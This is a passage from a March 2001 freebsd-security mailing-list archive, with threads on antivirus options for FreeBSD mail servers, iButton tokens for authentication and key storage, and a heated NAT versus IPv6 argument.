	for <freebsd-security@freebsd.org>; Mon, 12 Mar 2001 21:05:32 -0800 (PST)
	(envelope-from neve_ripe@yahoo.com)
Received: from f2f.tsua.net (HELO never) (212.40.34.58)
  by smtp.mail.vip.sc5.yahoo.com with SMTP; 13 Mar 2001 05:05:31 -0000
X-Apparently-From: <neve?ripe@yahoo.com>
Date: Tue, 13 Mar 2001 07:05:24 +0200
From: Alexandr Kovalenko <neve_ripe@yahoo.com>
X-Mailer: The Bat! (v1.49) UNREG / CD5BF9353B3B7091
Reply-To: Alexandr Kovalenko <neve_ripe@yahoo.com>
Organization: UIC Group
X-Priority: 3 (Normal)
Message-ID: <060144903.20010313070524@yahoo.com>
To: "Will Mitayai Keeso Rowe" <mit@mitayai.net>
Cc: freebsd-security@freebsd.org
Subject: Re: Virus Scanning Software for FreeBSD
In-reply-To: <NEBBIEGPMLMKDBMMICFNCEPPELAA.mit@mitayai.net>
References: <NEBBIEGPMLMKDBMMICFNCEPPELAA.mit@mitayai.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hello Will,

Monday, March 12, 2001, 11:56:43 PM, you wrote:

WMKR> Is anyone aware of any virus scanning solutions for freebsd, particularly
WMKR> solutions for email? I don't trust my users not to follow proper email
WMKR> guidelines, and thus would like to stop email at the server before they get
WMKR> delivered the message.
There is antivirus software called AVP, it has versions for FreeBSD
4.x and 3.x. It has good virus base (for now ~45000). It can be
incorporated with sendmail too.

See http://www.kaspersky.com/ for details.

-- 
Best regards,
 Alexandr                            mailto:neve_ripe@yahoo.com







From owner-freebsd-security  Mon Mar 12 21:33:33 2001
Delivered-To: freebsd-security@freebsd.org
Received: from gull.prod.itd.earthlink.net (gull.prod.itd.earthlink.net [207.217.121.85])
	by hub.freebsd.org (Postfix) with ESMTP id B5B1F37B718
	for <freebsd-security@freebsd.org>; Mon, 12 Mar 2001 21:33:30 -0800 (PST)
	(envelope-from dhagan@colltech.com)
Received: from colltech.com (1Cust6.tnt4.clarksburg.wv.da.uu.net [63.15.39.6])
	by gull.prod.itd.earthlink.net (EL-8_9_3_3/8.9.3) with ESMTP id VAA13553
	for <freebsd-security@freebsd.org>; Mon, 12 Mar 2001 21:33:29 -0800 (PST)
Message-ID: <3AADB1D3.C70E00C@colltech.com>
Date: Tue, 13 Mar 2001 00:36:19 -0500
From: Daniel Hagan <dhagan@colltech.com>
X-Mailer: Mozilla 4.73 [en] (WinNT; U)
X-Accept-Language: en
MIME-Version: 1.0
To: freebsd-security@freebsd.org
Subject: iButton Development
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

There was some discussion regarding iButtons in mid-Jan on this list. 
I'm interested in getting one or more of these things to play with, with
the goal of:

o Authenticating myself to my home workstations (pam module?).

o Storing PGP & ssh keys.

Since I assume these are tasks of interest to more people than just
myself, I was wondering:

o Does anyone have existing code bases to support these tasks?

o Is there any support (in the political sense) for getting the pam
module and/or other code incorporated into the base system or as a port?

o Does anyone have any recommendations on what hardware to procure for
these tasks?  I was looking at getting a serial port BlueDot (possibly
two or three, I have some laptops I may want to use this with too) and a
DS1996L-F5 64-kbit Memory iButton.  I would also think about getting a
Java-powered iButton, Model 96, Release 1.1 (or 2.2) if I understood
exactly what I'd be getting for the money.  Does anyone have any
information/examples on how these Java iButtons are used?

Thanks,

Daniel



From owner-freebsd-security  Mon Mar 12 22:34:14 2001
Delivered-To: freebsd-security@freebsd.org
Received: from server.mbg.com.ge (server.mbg.com.ge [212.72.131.237])
	by hub.freebsd.org (Postfix) with SMTP id 8DB5C37B718
	for <freebsd-security@freebsd.org>; Mon, 12 Mar 2001 22:34:03 -0800 (PST)
	(envelope-from nugzar@mbg.com.ge)
Received: (qmail 10694 invoked from network); 13 Mar 2001 06:59:30 -0000
Received: from unknown (HELO nugzar) (192.168.170.152)
  by server.mbg.com.ge with SMTP; 13 Mar 2001 06:59:30 -0000
Date: Tue, 13 Mar 2001 10:34:00 +0400
From: Nugzar Nebieridze <nugzar@mbg.com.ge>
X-Mailer: The Bat! (v1.44) UNREG / CD5BF9353B3B7091
Reply-To: Nugzar Nebieridze <nugzar@mbg.com.ge>
X-Priority: 3 (Normal)
Message-ID: <1363890484.20010313103400@mbg.com.ge>
To: freebsd-security@freebsd.org
Subject: Re[2]: Virus Scanning Software for FreeBSD
In-reply-To: <060144903.20010313070524@yahoo.com>
References: <NEBBIEGPMLMKDBMMICFNCEPPELAA.mit@mitayai.net>
 <060144903.20010313070524@yahoo.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hello Alexandr,

Tuesday, March 13, 2001, 9:05:24 AM, you wrote:

AK> Hello Will,

AK> Monday, March 12, 2001, 11:56:43 PM, you wrote:

WMKR>> Is anyone aware of any virus scanning solutions for freebsd, particularly
WMKR>> solutions for email? I don't trust my users not to follow proper email
WMKR>> guidelines, and thus would like to stop email at the server before they get
WMKR>> delivered the message.
AK> There is antivirus software called AVP, it has versions for FreeBSD
AK> 4.x and 3.x. It has good virus base (for now ~45000). It can be
AK> incorporated with sendmail too.

AK> See http://www.kaspersky.com/ for details.


This company provides AntiVirus software for Windows, FreeBSD and
Linux. If your server is heavily loaded then they are also providing a
daemon AVP that loads its databases only once when you start it and
then you can connect to its socket and pass data to check on viruses.
It requires less computer resources. It is not free, but you can
download demo version that will be able to detect viruses only but not
disinfect them...

Hope it helps.

Nugzar





From owner-freebsd-security  Mon Mar 12 22:52:22 2001
Delivered-To: freebsd-security@freebsd.org
Received: from daedalus.cs.brandeis.edu (daedalus.cs.brandeis.edu [129.64.3.179])
	by hub.freebsd.org (Postfix) with ESMTP id BC4CF37B750
	for <freebsd-security@FreeBSD.ORG>; Mon, 12 Mar 2001 22:52:13 -0800 (PST)
	(envelope-from meshko@daedalus.cs.brandeis.edu)
Received: from localhost (meshko@localhost)
	by daedalus.cs.brandeis.edu (8.9.3/8.9.3) with ESMTP id BAA04636;
	Tue, 13 Mar 2001 01:51:57 -0500
Date: Tue, 13 Mar 2001 01:51:57 -0500 (EST)
From: Mikhail Kruk <meshko@cs.brandeis.edu>
To: Nugzar Nebieridze <nugzar@mbg.com.ge>
Cc: <freebsd-security@FreeBSD.ORG>
Subject: Re: Re[2]: Virus Scanning Software for FreeBSD
In-Reply-To: <1363890484.20010313103400@mbg.com.ge>
Message-ID: <Pine.LNX.4.30.0103130149050.4508-100000@daedalus.cs.brandeis.edu>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

> AK> See http://www.kaspersky.com/ for details.

...off-topic...

but I remember the first antivirus made by this guy, Kaspersky... if I'm
not mistaken, it was a MS DOS TSR program written in Pascal which
monitored interrupt handlers, writes to MBR etc...




From owner-freebsd-security  Mon Mar 12 23: 4:54 2001
Delivered-To: freebsd-security@freebsd.org
Received: from mail.freebsd-corp-net-guide.com (mail.freebsd-corp-net-guide.com [206.29.169.15])
	by hub.freebsd.org (Postfix) with ESMTP
	id 33F7C37B718; Mon, 12 Mar 2001 23:04:48 -0800 (PST)
	(envelope-from tedm@toybox.placo.com)
Received: from tedm.placo.com (nat-rtr.freebsd-corp-net-guide.com [206.29.168.154])
	by mail.freebsd-corp-net-guide.com (8.11.1/8.11.1) with SMTP id f2D723N18585;
	Mon, 12 Mar 2001 23:02:03 -0800 (PST)
	(envelope-from tedm@toybox.placo.com)
From: "Ted Mittelstaedt" <tedm@toybox.placo.com>
To: "Bob Van Valzah" <Bob@Talarian.Com>,
	"pW" <packetwhore@stargate.net>
Cc: <FreeBSD-Security@FreeBSD.ORG>, <FreeBSD-Questions@FreeBSD.ORG>
Subject: RE: Racoon Problem & Cisco Tunnel
Date: Mon, 12 Mar 2001 23:02:03 -0800
Message-ID: <000801c0ab8b$81d99ca0$1401a8c0@tedm.placo.com>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0
In-Reply-To: <3AACF40D.4080504@Talarian.Com>
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3155.0
Importance: Normal
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>-----Original Message-----
>From: owner-freebsd-questions@FreeBSD.ORG
>[mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Bob Van Valzah
>Sent: Monday, March 12, 2001 8:07 AM
>To: pW
>Cc: FreeBSD-Security@FreeBSD.ORG; FreeBSD-Questions@FreeBSD.ORG
>Subject: Re: Racoon Problem & Cisco Tunnel
>
>
>Yes. The five DSL setups with which I'm familiar all grant at least one
>public address per house. I believe all are static, but one might be
>dynamic. Interference with protocols like IPSec is one of the reasons
>why I'd make a public address a requirement when choosing a DSL
>provider. When it comes to NAT, I'm with Vint Cerf--avoid it if at all
>possible. Let's hasten the deployment of IPv6.
>

I'd agree with you if everyone that would have to do a renumber of a
large network from IPv4 to IPv6 had Vint Cerf's money.  When you're retired
like him with money coming out your arse-hole you can afford to make
irresponsible statements like that.

Unfortunately, what people like him don't understand is that the burden of
renumbering the fabric of the Internet from IPv4 to IPv6 will fall largely
on people like me - who have thousands of customers and tens of thousands of
public IP numbers spread out among all of them - and who don't have the
money to support something this audacious.  I can almost guarantee that
whatever ISP that I am working for when this finally happens is going to go
out of business, all it's going to do is put thousands of smaller to
medium-sized ISP's into bankruptcy and let people like AOL who have money
coming out their arse-holes virtually monopolize Internet access in the
world.

Until I see the large organizations with Class A's tied up, give up those
numbers back to the pool, I'll fight any attempt to move from IPv4 to IPv6,
and most other ISP's that are out there are going to fight it as well.  In
the meantime I'm pushing all my customers into using NAT.  NAT is here to
stay and people that run around calling it an aberration are just proving to
the rest of us that they have absolutely no business sense.

NAT has proven itself reliable and vital and idiot engineers that design TCP
protocols that assume everyone has a public IP number are just architecting
their own failures, and their protocol's subsequent minimizing by the
market.  I have some sympathy for protocols like IPSec that came to be
during the same time - but organizational-to-organizational IPSec tunnels
don't have to pass through the NAT - they can terminate on it.  But, anyone
doing a new protocol today is a fool if it can't work through a NAT.



Ted Mittelstaedt                      tedm@toybox.placo.com
Author of:          The FreeBSD Corporate Networker's Guide
Book website:         http://www.freebsd-corp-net-guide.com







From owner-freebsd-security  Tue Mar 13  5:27: 7 2001
Delivered-To: freebsd-security@freebsd.org
Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.86.136])
	by hub.freebsd.org (Postfix) with ESMTP id CE27437B725
	for <freebsd-security@FreeBSD.ORG>; Tue, 13 Mar 2001 05:26:59 -0800 (PST)
	(envelope-from phk@critter.freebsd.dk)
Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.86.163])
	by phk.freebsd.dk (8.9.3/8.9.3) with ESMTP id OAA42540;
	Tue, 13 Mar 2001 14:26:57 +0100 (CET)
	(envelope-from phk@critter.freebsd.dk)
Received: from critter (localhost [127.0.0.1])
	by critter.freebsd.dk (8.11.1/8.11.1) with ESMTP id f2DDREp06942;
	Tue, 13 Mar 2001 14:27:15 +0100 (CET)
	(envelope-from phk@critter.freebsd.dk)
To: Daniel Hagan <dhagan@colltech.com>
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: iButton Development 
In-Reply-To: Your message of "Tue, 13 Mar 2001 00:36:19 EST."
             <3AADB1D3.C70E00C@colltech.com> 
Date: Tue, 13 Mar 2001 14:27:14 +0100
Message-ID: <6940.984490034@critter>
From: Poul-Henning Kamp <phk@critter.freebsd.dk>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In message <3AADB1D3.C70E00C@colltech.com>, Daniel Hagan writes:
>There was some discussion regarding iButtons in mid-Jan on this list. 
>I'm interested in getting one or more of these things to play with, with
>the goal of:

The best I can suggest to you is that we rally all efforts
around:
	http://anoncvs.aldigital.co.uk/iBLab/

--
Poul-Henning Kamp       | UNIX since Zilog Zeus 3.20
phk@FreeBSD.ORG         | TCP/IP since RFC 956
FreeBSD committer       | BSD since 4.3-tahoe    
Never attribute to malice what can adequately be explained by incompetence.



From owner-freebsd-security  Tue Mar 13  5:47:47 2001
Delivered-To: freebsd-security@freebsd.org
Received: from smtp.whitebarn.com (Spin.whitebarn.com [216.0.13.113])
	by hub.freebsd.org (Postfix) with ESMTP
	id E8C3237B72D; Tue, 13 Mar 2001 05:47:35 -0800 (PST)
	(envelope-from Bob@Talarian.Com)
Received: from Talarian.Com (Relent.Bob.whitebarn.com [216.0.13.50])
	by smtp.whitebarn.com (8.9.3/8.9.3) with ESMTP id HAA38781;
	Tue, 13 Mar 2001 07:47:19 -0600 (CST)
	(envelope-from Bob@Talarian.Com)
Message-ID: <3AAE24E6.9080802@Talarian.Com>
Date: Tue, 13 Mar 2001 07:47:18 -0600
From: Bob Van Valzah <Bob@Talarian.Com>
User-Agent: Mozilla/5.0 (X11; U; Linux 2.2.12 i386; en-US; 0.8) Gecko/20010215
X-Accept-Language: en
MIME-Version: 1.0
To: Ted Mittelstaedt <tedm@toybox.placo.com>
Cc: pW <packetwhore@stargate.net>, FreeBSD-Security@FreeBSD.ORG,
	FreeBSD-Questions@FreeBSD.ORG
Subject: Re: Racoon Problem & Cisco Tunnel
References: <000801c0ab8b$81d99ca0$1401a8c0@tedm.placo.com>
Content-Type: multipart/alternative;
 boundary="------------080107090808010207030409"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org


--------------080107090808010207030409
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Ted, Loved the book--can't wait for the movie!

This is a religious war that's been fought many times before. Since my 
last answer was too flip, I'll clarify my point of view. IPv4, IPv6, and 
NAT are all just tools that I have to apply with "business sense." NAT's 
not inherently evil, nor is IPv6. Their sensibility will change over 
time and depend upon the application.

If I were shopping for DSL for "my mom," I wouldn't care if she got a 
public address or not. Reliability and good support (as a "little guy" 
can more often provide) would be more important.

But when I'm shopping for DSL for a work-from-home, multicast protocol 
stack developer, a public address is a requirement. In fact, it's 
something I'll pay extra to get. For my business, IPSec is important and 
hence having at least one public address is important.

My protocol developers have a few LANs at home and we happily use NAT 
there. I wouldn't pay extra to get enough address space to put public 
addresses on all their home lab machines.

An ISP who won't give me at least one public address is just limiting 
where I can apply their service. An ISP who gives me one or more public 
addresses lets me pick the point at which I want to apply NAT.

So in spite of my flip remarks, I hope you can see that I do use NAT--I 
just put it off to the last minute where it doesn't make business sense 
to avoid it.

   Bob

Ted Mittelstaedt wrote:

>> -----Original Message-----
>> From: owner-freebsd-questions@FreeBSD.ORG
>> [mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Bob Van Valzah
>> Sent: Monday, March 12, 2001 8:07 AM
>> To: pW
>> Cc: FreeBSD-Security@FreeBSD.ORG; FreeBSD-Questions@FreeBSD.ORG
>> Subject: Re: Racoon Problem & Cisco Tunnel
>> 
>> 
>> Yes. The five DSL setups with which I'm familiar all grant at least one
>> public address per house. I believe all are static, but one might be
>> dynamic. Interference with protocols like IPSec is one of the reasons
>> why I'd make a public address a requirement when choosing a DSL
>> provider. When it comes to NAT, I'm with Vint Cerf--avoid it if at all
>> possible. Let's hasten the deployment of IPv6.
>> 
> 
> I'd agree with you if everyone that would have to do a renumber of a
> large network from IPv4 to IPv6 had Vint Cerf's money.  When you're retired
> like him with money coming out your arse-hole you can afford to make
> irresponsible statements like that.
> 
> Unfortunately, what people like him don't understand is that the burden of
> renumbering the fabric of the Internet from IPv4 to IPv6 will fall largely
> on people like me - who have thousands of customers and tens of thousands of
> public IP numbers spread out among all of them - and who don't have the
> money to support something this audacious.  I can almost guarantee that
> whatever ISP that I am working for when this finally happens is going to go
> out of business, all it's going to do is put thousands of smaller to
> medium-sized ISP's into bankruptcy and let people like AOL who have money
> coming out their arse-holes virtually monopolize Internet access in the
> world.
> 
> Until I see the large organizations with Class A's tied up, give up those
> numbers back to the pool, I'll fight any attempt to move from IPv4 to IPv6,
> and most other ISP's that are out there are going to fight it as well.  In
> the meantime I'm pushing all my customers into using NAT.  NAT is here to
> stay and people that run around calling it an aberration are just proving to
> the rest of us that they have absolutely no business sense.
> 
> NAT has proven itself reliable and vital and idiot engineers that design TCP
> protocols that assume everyone has a public IP number are just architecting
> their own failures, and their protocol's subsequent minimizing by the
> market.  I have some sympathy for protocols like IPSec that came to be
> during the same time - but organizational-to-organizational IPSec tunnels
> don't have to pass through the NAT - they can terminate on it.  But, anyone
> doing a new protocol today is a fool if it can't work through a NAT.
> 
> 
> 
> Ted Mittelstaedt                      tedm@toybox.placo.com
> Author of:          The FreeBSD Corporate Networker's Guide
> Book website:         http://www.freebsd-corp-net-guide.com
> 
> 
> 


--------------080107090808010207030409--




From owner-freebsd-security  Tue Mar 13  6:51: 4 2001
Delivered-To: freebsd-security@freebsd.org
Received: from tiger.thinksec.com (tiger.thinksec.com [193.212.248.18])
	by hub.freebsd.org (Postfix) with ESMTP id 3D19237B72C
	for <freebsd-security@freebsd.org>; Tue, 13 Mar 2001 06:50:51 -0800 (PST)
	(envelope-from terje@thinksec.no)
Received: by tiger.thinksec.com (Postfix, from userid 1001)
	id 970C5106042; Tue, 13 Mar 2001 15:50:47 +0100 (CET)
Date: Tue, 13 Mar 2001 15:50:46 +0100
From: Terje Elde <terje@thinksec.no>
To: Daniel Hagan <dhagan@colltech.com>
Cc: freebsd-security@freebsd.org
Subject: Re: iButton Development
Message-ID: <20010313155046.E9762@thinksec.com>
References: <3AADB1D3.C70E00C@colltech.com>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
	protocol="application/pgp-signature"; boundary="Oiv9uiLrevHtW1RS"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <3AADB1D3.C70E00C@colltech.com>; from dhagan@colltech.com on Tue, Mar 13, 2001 at 12:36:19AM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org


--Oiv9uiLrevHtW1RS
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Tue, Mar 13, 2001 at 12:36:19AM -0500, Daniel Hagan wrote:
> There was some discussion regarding iButtons in mid-Jan on this list.
> I'm interested in getting one or more of these things to play with, with
> the goal of:

For reasons I don't quite know I missed that thread...  However I'm the
coordinator of the iButton project, which aims to define a set of API's to
communicate with iButtons, or the 1-wire bus in general, as well as making a
daemon to handle the actual communication with the 1-wire bus, as well as
multiplexing between users and applications where desired.

I must admit the project has been idle for a little while now, though I'm sure a
cooperation could be mutually beneficial.

> o Authenticating myself to my home workstations (pam module?).

Our plans include making a pam module which uses the API's(/sdk) for either
simple authentication using the serial number on the iButtons (yuck) or my
favorite, full public key authentication using the java iButtons.

> o Storing PGP & ssh keys.

Also an obvious extension.  One idea we've been playing with is to not only
keep the keys on the button, but never to let them be anywhere else.  The java
iButton for example, could handle the cryptographic functions for you.  It
features cool things like rapid destroying of the content should you try to
tamper with it.

> Since I assume these are tasks of interest to more people than just
> myself, I was wondering:
>
> o Does anyone have existing code bases to support these tasks?

We've done very basic coding and design of the API's, though we don't have any
of the code working with the actual buttons up and running yet.

> o Is there any support (in the political sense) for getting the pam
> module and/or other code incorporated into the base system or as a port?

Strong cryptographic authentication system and secure storage with possible
extension of cheap industrial chips with everything from temp sensors to AD/DA
converters and whatnot.  Who wouldn't want it?

> o Does anyone have any recommendations on what hardware to procure for
> these tasks?  I was looking at getting a serial port BlueDot (possibly
> two or three, I have some laptops I may want to use this with too) and a
> DS1996L-F5 64-kbit Memory iButton.  I would also think about getting a
> Java-powered iButton, Model 96, Release 1.1 (or 2.2) if I understood
> exactly what I'd be getting for the money.  Does anyone have any
> information/examples on how these Java iButtons are used?

You probably want the following (in the order they're listed in the dalsemi
shop online):

 * DS1921L-F52 - Thermochron (-20°C to +85°C)
   It'll allow you to play more with the bus, making sure the knowledge
   sticks.  Not really required for these tasks, but it's so cute.

 * DS19550-401 - Java-powered iButton, Model 96, Release 1.1
 * DS1957B-406 - Java-powered iButton, Model 96, Release 1.1

   You want both, because if you're going to do development on these, you'll
   probably want to make sure your software will work properly on both.

   As for what you'll get...

   * JVM
     These babies actually run Java code, as long as they're docked and have
     power.  As soon as you rip out the power, the applications are still in a
     running state, but their execution speed is frozen so to speak.

   * PRNG
     Perfect to both feed your Java code, and perhaps also relay to a FreeBSD
     box to help feed its PRNG.

   * Crypto
     * SHA-1
     * RSA
     * DES
     * 3DES

     The math accelerator for RSA operations handles them with a less than 1
     sec worst-case.

     At least the 2.2 release has 134kbytes of RAM, which makes it the iButton
     with the biggest storage.

 * DS1963S-F5  - SHA-1 iButton
   You'll want this so you can do keyed hashes for authentication.  It's much
   better than the java iButtons for this task, due to its lower price.

In addition to those you'll want some of the other memory iButtons, a nice
selection to fit your taste.  I recommend you get at least two or so of the
bigger ones, and as many as you feel like of the cheaper.

For connectivity I would like to suggest that you get one or several serial
adaptors, with matching bluedots.  Let me remind you that there are
differences between them, but which you'd want is perhaps a matter of taste.
Getting some of each might not be a bad idea.  I would recommend you stick
with serial, as they're supposedly easier to use, and have some software
already available (hint: ports/comms/mlan, though it's not up to date (hint)).

You might also want to look at the TINI, as it's got a 1-wire device, and
would be pretty nice to integrate with everything.

Terje "delta" Elde
ThinkSec AS

--Oiv9uiLrevHtW1RS
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE6rjPGtO3jfBe8qO0RAjK3AJ9t+VS+teR9jzyqkq5Vn0V9B1x2RQCfXbG4
rdCFa/r/9xjfdth83VbHeKo=
=mDuZ
-----END PGP SIGNATURE-----

--Oiv9uiLrevHtW1RS--



From owner-freebsd-security  Tue Mar 13  6:59:17 2001
Delivered-To: freebsd-security@freebsd.org
Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.86.136])
	by hub.freebsd.org (Postfix) with ESMTP id 9E15D37B71F
	for <freebsd-security@FreeBSD.ORG>; Tue, 13 Mar 2001 06:59:12 -0800 (PST)
	(envelope-from phk@critter.freebsd.dk)
Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.86.163])
	by phk.freebsd.dk (8.9.3/8.9.3) with ESMTP id PAA43884;
	Tue, 13 Mar 2001 15:59:11 +0100 (CET)
	(envelope-from phk@critter.freebsd.dk)
Received: from critter (localhost [127.0.0.1])
	by critter.freebsd.dk (8.11.1/8.11.1) with ESMTP id f2DExTp07859;
	Tue, 13 Mar 2001 15:59:29 +0100 (CET)
	(envelope-from phk@critter.freebsd.dk)
To: Terje Elde <terje@thinksec.no>
Cc: Daniel Hagan <dhagan@colltech.com>, freebsd-security@FreeBSD.ORG
Subject: Re: iButton Development 
In-Reply-To: Your message of "Tue, 13 Mar 2001 15:50:46 +0100."
             <20010313155046.E9762@thinksec.com> 
Date: Tue, 13 Mar 2001 15:59:29 +0100
Message-ID: <7857.984495569@critter>
From: Poul-Henning Kamp <phk@critter.freebsd.dk>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org


My share in this is mostly the monitoring gadgets with the 1wire
products, but given working software I would probably put my pgp
key somewhere more safe as well.

--
Poul-Henning Kamp       | UNIX since Zilog Zeus 3.20
phk@FreeBSD.ORG         | TCP/IP since RFC 956
FreeBSD committer       | BSD since 4.3-tahoe    
Never attribute to malice what can adequately be explained by incompetence.



From owner-freebsd-security  Tue Mar 13  7: 5:47 2001
Delivered-To: freebsd-security@freebsd.org
Received: from tiger.thinksec.com (tiger.thinksec.com [193.212.248.18])
	by hub.freebsd.org (Postfix) with ESMTP id 0732B37B724
	for <freebsd-security@FreeBSD.ORG>; Tue, 13 Mar 2001 07:05:42 -0800 (PST)
	(envelope-from terje@thinksec.no)
Received: by tiger.thinksec.com (Postfix, from userid 1001)
	id 22EC4106042; Tue, 13 Mar 2001 16:05:40 +0100 (CET)
Date: Tue, 13 Mar 2001 16:05:40 +0100
From: Terje Elde <terje@thinksec.no>
To: Poul-Henning Kamp <phk@critter.freebsd.dk>
Cc: Daniel Hagan <dhagan@colltech.com>, freebsd-security@FreeBSD.ORG
Subject: Re: iButton Development
Message-ID: <20010313160540.F9762@thinksec.com>
References: <20010313155046.E9762@thinksec.com> <7857.984495569@critter>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
	protocol="application/pgp-signature"; boundary="R6sEYoIZpp9JErk7"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <7857.984495569@critter>; from phk@critter.freebsd.dk on Tue, Mar 13, 2001 at 03:59:29PM +0100
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org


--R6sEYoIZpp9JErk7
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

On Tue, Mar 13, 2001 at 03:59:29PM +0100, Poul-Henning Kamp wrote:
> My share in this is mostly the monitoring gadgets with the 1wire
> products, but given working software I would probably put my pgp
> key somewhere more safe as well.

I do see your concern, and I would not automatically trust the iButtons 100%,
but it's a good hardware building block to base things on.  If you store an
encrypted version of your pgp/ssh keys on it, then you would really need to
break the algorithm to gain access to the keys, in which case you can attack
pgp in itself anyways. (simplified; if you break the symmetric cipher which
has encrypted the keys stored on the iButton then you've got the keys, while
if you had broken the same symmetric cipher in pgp itself, the keys would be
safe as soon as you switch to another algorithm, and you would have to perform
one such crack for each message).

Or rather, in the end how things are set up and used is really up to the end
user.  My goal is to try to help provide the tools to make the technology
available, and also the guidance to balance the risks.  What makes a good
choice is highly dependent on a lot of factors, and what's right for you isn't
always right for everyone else.  If my access was limited to a single shared
win95 box, then I'd feel much more comfortable with an iButton performing the
crypto for me, and keeping the keys, than storing them on the windows box.

Terje "delta" Elde
ThinkSec AS

--R6sEYoIZpp9JErk7
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE6rjdEtO3jfBe8qO0RAj1YAJ4p73caXUlQoCxQi9SkogN6tocCgQCfUWfW
FfwG5z59uawYKJYAICvebyw=
=QnMf
-----END PGP SIGNATURE-----

--R6sEYoIZpp9JErk7--



From owner-freebsd-security  Tue Mar 13  7:18:58 2001
Delivered-To: freebsd-security@freebsd.org
Received: from tiger.thinksec.com (tiger.thinksec.com [193.212.248.18])
	by hub.freebsd.org (Postfix) with ESMTP id 822DF37B72B
	for <freebsd-security@FreeBSD.ORG>; Tue, 13 Mar 2001 07:18:54 -0800 (PST)
	(envelope-from terje@thinksec.no)
Received: by tiger.thinksec.com (Postfix, from userid 1001)
	id AEE51106042; Tue, 13 Mar 2001 16:18:52 +0100 (CET)
Date: Tue, 13 Mar 2001 16:18:52 +0100
From: Terje Elde <terje@thinksec.no>
To: Borja Marcos <borjamar@sarenet.es>
Cc: Poul-Henning Kamp <phk@critter.freebsd.dk>,
	freebsd-security@FreeBSD.ORG
Subject: Re: iButton Development
Message-ID: <20010313161852.G9762@thinksec.com>
References: <3AADB1D3.C70E00C@colltech.com> <20010313155046.E9762@thinksec.com> <3AAE3809.F795A6A5@sarenet.es>
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
	protocol="application/pgp-signature"; boundary="RDS4xtyBfx+7DiaI"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <3AAE3809.F795A6A5@sarenet.es>; from borjamar@sarenet.es on Tue, Mar 13, 2001 at 04:08:57PM +0100
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org


--RDS4xtyBfx+7DiaI
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Tue, Mar 13, 2001 at 04:08:57PM +0100, Borja Marcos wrote:
> > Also an obvious extension.  One idea we've been playing with is to not only
> > keep the keys on the button, but never to let them be anywhere else.  The java
> > iButton for example, could handle the cryptographic functions for you.  It
> > features cool things like rapid destroying of the content should you try to
> > tamper with it.
> 
> 	This would be the ideal system; when used for ssh, for example,
> the button stores the private part of the RSA key, and the challenge is
> sent by the ssh-agent to the button. It encrypts the challenge and
> returns the answer.
> 
> 	If the key is kept inside the button, it can be useful even
> in hostile environments. I understand that now there are buttons
> capable of running small programs.

As Poul-Henning points out, doing this isn't for everyone.  It pretty much
boils down to what you trust the most.  The security of your hardware/software
and your ability to set it up, or the iButtons.

In the case of my private workstation, I'd normally prefer running the crypto
on the workstation itself, not allowing the iButtons to be as much of a weak
link.  Should I ever have the need for ssh'ing from public company terminals
to not quite secure systems on the other hand, this would be a good idea.

A toolkit to pick what one likes from, not enforcing the way I want it on
everyone else.

Terje

--RDS4xtyBfx+7DiaI
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE6rjpctO3jfBe8qO0RAgihAJ9L0CUVce5vJBxeLqnEXE4P1zszpACff1kF
x90lqiz16wedeCk/ZVdc0aM=
=Hywq
-----END PGP SIGNATURE-----

--RDS4xtyBfx+7DiaI--
